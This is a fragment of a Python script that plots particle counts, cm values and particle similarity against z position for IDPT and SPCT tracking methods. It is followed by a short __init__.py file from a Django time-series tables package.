PLOT NUMBER OF PARTICLES PER Z_TRUE AND CM dftm = dftg.groupby('z_true').mean().reset_index() dfs_offm = dfs_off.groupby('z_true').mean().reset_index() dfs_onm = dfs_on.groupby('z_true').mean().reset_index() # filter z_true for pretty plotting dftm = dftm[(dftm['z_true'] > -zlim) & (dftm['z_true'] < zlim)] dfs_offm = dfs_offm[(dfs_offm['z_true'] > -zlim) & (dfs_offm['z_true'] < zlim)] dfs_onm = dfs_onm[(dfs_onm['z_true'] > -zlim) & (dfs_onm['z_true'] < zlim)] # plot fig, [axr, ax] = plt.subplots(nrows=2, sharex=True, gridspec_kw={'height_ratios': [1, 2]}) axr.plot(dftm.z_true, dftm.cm, '-o', ms=ms - 1, color=sciblue) axr.plot(dfs_offm.z_true, dfs_offm.cm, '-o', ms=ms - 1, color=lighten_color(scigreen, 1.0)) axr.plot(dfs_onm.z_true, dfs_onm.cm, '-o', ms=ms - 1, color=lighten_color(scigreen, 1.2)) axr.set_ylabel(r'$c_{m}$') axr.set_ylim([0.790, 1.01]) axr.set_yticks([0.8, 0.9, 1.0]) ax.plot(dftc.z_true, dftc.z, '-o', ms=ms, color=sciblue, label=r'$IDPT$') ax.plot(dfs_offc.z_true, dfs_offc.z, '-o', ms=ms, color=lighten_color(scigreen, 1.0), label=r'$SPCT_{Low}$') ax.plot(dfs_onc.z_true, dfs_onc.z, '-o', ms=ms, color=lighten_color(scigreen, 1.2), label=r'$SPCT_{High}$') ax.set_xlabel(r'$z \: (\mu m)$') ax.set_xlim([-xylim, xylim]) ax.set_xticks(xyticks) ax.set_ylabel(r'$N_{p} \: (\#)$') ax.set_ylim([0, 185]) ax.set_yticks([0, 50, 100, 150]) ax.legend() plt.tight_layout() if save_plots: plt.savefig(path_figs + '/compare-idpt-spct_num-particles_and_cm.png') if show_plots: plt.show() plt.close() # ---------------------------------------------------------------------------------------------------------------------- # 6. AVERAGE PARTICLE-TO-PARTICLE SIMILARITY PER-FRAME plot_average_particle_similarity = False if plot_average_particle_similarity: # setup save_plots = True xylim = 37.25 xyticks = [-30, -15, 0, 15, 30] ms = 3 # read dataframe fp = join(base_dir, 'average-particle-similarity/' 'average_similarity_SPCT_11.02.21-BPE_Pressure_Deflection_20X_c-calib1_t-calib2.xlsx') dfsim = pd.read_excel(fp) # plot fig, ax = plt.subplots() ax.plot(dfsim.z_corr, dfsim.sim, '-o', ms=ms) ax.set_xlabel(r'$z \: (\mu m)$') ax.set_xlim([-xylim, xylim]) ax.set_xticks(xyticks) ax.set_ylabel(r'$S (p_{i}, p_{N})$') ax.set_ylim([0.49, 1.01]) plt.tight_layout() if save_plots: plt.savefig(path_figs + '/average-particle-to-particle-similarity.png') plt.show() plt.close() j = 1 print("Analysis completed without errors.")
2.296875
2
django_timeseries_tables/__init__.py
androbwebb/django-timeseries-tables
0
12789950
from .fields import NormalField, ForeignKey  # noqa:F401
from .models import TimeSeriesModel  # noqa:F401

__version__ = '0.1.3'
1.234375
1